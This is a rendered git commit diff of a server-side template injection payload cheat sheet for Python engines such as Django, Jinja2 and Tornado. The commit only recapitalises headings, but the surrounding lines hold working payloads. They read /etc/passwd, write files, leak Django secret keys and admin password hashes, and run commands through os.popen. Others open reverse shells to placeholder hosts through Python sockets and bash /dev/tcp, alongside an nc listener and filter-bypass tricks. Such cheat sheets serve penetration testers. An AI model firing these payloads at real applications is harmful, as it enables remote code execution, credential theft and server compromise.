7
7
8
8
- [ Templating Libraries] ( #templating-libraries )
9
9
- [ Django] ( #django )
10
- - [ Django - Basic injection ] ( #django---basic-injection )
11
- - [ Django - Cross-site scripting ] ( #django---cross-site-scripting )
12
- - [ Django - Debug information leak ] ( #django---debug-information-leak )
13
- - [ Django - Leaking app 's Secret Key] ( #django---leaking-apps-secret-key )
10
+ - [ Django - Basic Injection ] ( #django---basic-injection )
11
+ - [ Django - Cross-Site Scripting ] ( #django---cross-site-scripting )
12
+ - [ Django - Debug Information Leak ] ( #django---debug-information-leak )
13
+ - [ Django - Leaking App 's Secret Key] ( #django---leaking-apps-secret-key )
14
14
- [ Django - Admin Site URL leak] ( #django---admin-site-url-leak )
15
- - [ Django - Admin username and password hash leak ] ( #django---admin-username-and-password-hash-leak )
15
+ - [ Django - Admin Username and Password Hash Leak ] ( #django---admin-username-and-password-hash-leak )
16
16
- [ Jinja2] ( #jinja2 )
17
- - [ Jinja2 - Basic injection ] ( #jinja2---basic-injection )
18
- - [ Jinja2 - Template format ] ( #jinja2---template-format )
17
+ - [ Jinja2 - Basic Injection ] ( #jinja2---basic-injection )
18
+ - [ Jinja2 - Template Format ] ( #jinja2---template-format )
19
19
- [ Jinja2 - Debug Statement] ( #jinja2---debug-statement )
20
- - [ Jinja2 - Dump all used classes ] ( #jinja2---dump-all-used-classes )
21
- - [ Jinja2 - Dump all config variables ] ( #jinja2---dump-all-config-variables )
22
- - [ Jinja2 - Read remote file ] ( #jinja2---read-remote-file )
23
- - [ Jinja2 - Write into remote file ] ( #jinja2---write-into-remote-file )
20
+ - [ Jinja2 - Dump All Used Classes ] ( #jinja2---dump-all-used-classes )
21
+ - [ Jinja2 - Dump All Config Variables ] ( #jinja2---dump-all-config-variables )
22
+ - [ Jinja2 - Read Remote File ] ( #jinja2---read-remote-file )
23
+ - [ Jinja2 - Write Into Remote File ] ( #jinja2---write-into-remote-file )
24
24
- [ Jinja2 - Remote Command Execution] ( #jinja2---remote-command-execution )
25
- - [ Forcing output on blind RCE] ( #jinja2---forcing-output-on-blind-rce )
26
- - [ Exploit the SSTI by calling os.popen().read()] ( #exploit-the-ssti-by-calling-ospopenread )
27
- - [ Exploit the SSTI by calling subprocess.Popen] ( #exploit-the-ssti-by-calling-subprocesspopen )
28
- - [ Exploit the SSTI by calling Popen without guessing the offset ] ( #exploit-the-ssti-by-calling-popen-without-guessing-the-offset )
29
- - [ Exploit the SSTI by writing an evil config file. ] ( #exploit-the-ssti-by-writing-an-evil-config-file )
30
- - [ Jinja2 - Filter bypass ] ( #jinja2---filter-bypass )
25
+ - [ Forcing Output On Blind RCE] ( #jinja2---forcing-output-on-blind-rce )
26
+ - [ Exploit The SSTI By Calling os.popen().read()] ( #exploit-the-ssti-by-calling-ospopenread )
27
+ - [ Exploit The SSTI By Calling subprocess.Popen] ( #exploit-the-ssti-by-calling-subprocesspopen )
28
+ - [ Exploit The SSTI By Calling Popen Without Guessing The Offset ] ( #exploit-the-ssti-by-calling-popen-without-guessing-the-offset )
29
+ - [ Exploit The SSTI By Writing an Evil Config File ] ( #exploit-the-ssti-by-writing-an-evil-config-file )
30
+ - [ Jinja2 - Filter Bypass ] ( #jinja2---filter-bypass )
31
31
- [ Tornado] ( #tornado )
32
- - [ Tornado - Basic injection ] ( #tornado---basic-injection )
32
+ - [ Tornado - Basic Injection ] ( #tornado---basic-injection )
33
33
- [ Tornado - Remote Command Execution] ( #tornado---remote-command-execution )
34
34
- [ Mako] ( #mako )
35
35
- [ Mako - Remote Command Execution] ( #mako---remote-command-execution )
54
54
55
55
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
56
56
57
- ### Django - Basic injection
57
+ ### Django - Basic Injection
58
58
59
59
``` python
60
60
{% csrf_token % } # Causes error with Jinja2
@@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
63
63
```
64
64
65
65
66
- ### Django - Cross-site scripting
66
+ ### Django - Cross-Site Scripting
67
67
68
68
``` python
69
69
{{ ' <script>alert(3)</script>' }}
70
70
{{ ' <script>alert(3)</script>' | safe }}
71
71
```
72
72
73
- ### Django - Debug information leak
73
+ ### Django - Debug Information Leak
74
74
75
75
``` python
76
76
{% debug % }
77
77
```
78
78
79
- ### Django - Leaking app’ s Secret Key
79
+ ### Django - Leaking App' s Secret Key
80
80
81
81
``` python
82
82
{{ messages.storages.0.signer.key }}
@@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
89
89
{% include 'admin/base.html' %}
90
90
```
91
91
92
- ### Django - Admin username and password hash leak
92
+ ### Django - Admin Username And Password Hash Leak
93
93
94
94
95
95
```
@@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
104
104
[ Official website] ( https://jinja.palletsprojects.com/ )
105
105
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
106
106
107
- ### Jinja2 - Basic injection
107
+ ### Jinja2 - Basic Injection
108
108
109
109
``` python
110
110
{{4 * 4 }}[[5 * 5 ]]
@@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
115
115
Jinja2 is used by Python Web Frameworks such as Django or Flask.
116
116
The above injections have been tested on a Flask application.
117
117
118
- ### Jinja2 - Template format
118
+ ### Jinja2 - Template Format
119
119
120
120
``` python
121
121
{% extends " layout.html" % }
@@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
139
139
140
140
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
141
141
142
- ### Jinja2 - Dump all used classes
142
+ ### Jinja2 - Dump All Used Classes
143
143
144
144
``` python
145
145
{{ [].class .base.subclasses() }}
@@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
153
153
{{ self .__init__ .__globals__ .__builtins__ }}
154
154
```
155
155
156
- ### Jinja2 - Dump all config variables
156
+ ### Jinja2 - Dump All Config Variables
157
157
158
158
``` python
159
159
{% for key, value in config.iteritems() % }
@@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
162
162
{% endfor % }
163
163
```
164
164
165
- ### Jinja2 - Read remote file
165
+ ### Jinja2 - Read Remote File
166
166
167
167
``` python
168
168
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
172
172
{{ get_flashed_messages.__globals__ .__builtins__ .open(" /etc/passwd" ).read() }}
173
173
```
174
174
175
- ### Jinja2 - Write into remote file
175
+ ### Jinja2 - Write Into Remote File
176
176
177
177
``` python
178
178
{{ ' ' .__class__ .__mro__ [2 ].__subclasses__ ()[40 ](' /var/www/html/myflaskapp/hello.txt' , ' w' ).write(' Hello here !' ) }}
@@ -186,7 +186,7 @@ Listen for connection
186
186
nc -lnvp 8000
187
187
```
188
188
189
- #### Jinja2 - Forcing output on blind RCE
189
+ #### Jinja2 - Forcing Output On Blind RCE
190
190
191
191
You can import Flask functions to return an output from the vulnerable page.
192
192
@@ -203,7 +203,7 @@ def hook(*args, **kwargs):
203
203
```
204
204
205
205
206
- # ### Exploit the SSTI by calling os.popen().read()
206
+ # ### Exploit The SSTI By Calling os.popen().read()
207
207
208
208
```python
209
209
{{ self .__init__ .__globals__ .__builtins__ .__import__(' os' ).popen(' id' ).read() }}
@@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
235
235
236
236
Source: https:// twitter.com/ podalirius_/ status/ 1655970628648697860
237
237
238
- # ### Exploit the SSTI by calling subprocess.Popen
238
+ # ### Exploit The SSTI By Calling subprocess.Popen
239
239
240
240
:warning: the number 396 will vary depending of the application.
241
241
@@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
244
244
{{config.__class__ .__init__ .__globals__ [' os' ].popen(' ls' ).read()}}
245
245
```
246
246
247
- # ### Exploit the SSTI by calling Popen without guessing the offset
247
+ # ### Exploit The SSTI By Calling Popen Without Guessing The Offset
248
248
249
249
```python
250
250
{% for x in ().__class__ .__base__.__subclasses__ () % }{% if " warning" in x.__name__ % }{{x()._module.__builtins__ [' __import__' ](' os' ).popen(" python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\" ip\" ,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\" /bin/cat\" , \" flag.txt\" ]);'" ).read().zfill(417 )}}{% endif% }{% endfor % }
@@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
257
257
{% for x in ().__class__ .__base__.__subclasses__ () % }{% if " warning" in x.__name__ % }{{x()._module.__builtins__ [' __import__' ](' os' ).popen(request.args.input).read()}}{% endif% }{% endfor% }
258
258
```
259
259
260
- # ### Exploit the SSTI by writing an evil config file.
260
+ # ### Exploit The SSTI By Writing An Evil Config File
261
261
262
262
```python
263
263
# evil config
@@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
270
270
{{ config[' RUNCMD' ](' /bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"' ,shell = True ) }}
271
271
```
272
272
273
- # ## Jinja2 - Filter bypass
273
+ # ## Jinja2 - Filter Bypass
274
274
275
275
```python
276
276
request.__class__
@@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
313
313
314
314
# # Tornado
315
315
316
- # ## Tornado - Basic injection
316
+ # ## Tornado - Basic Injection
317
317
318
318
```py
319
319
{{7 * 7 }}
0 commit comments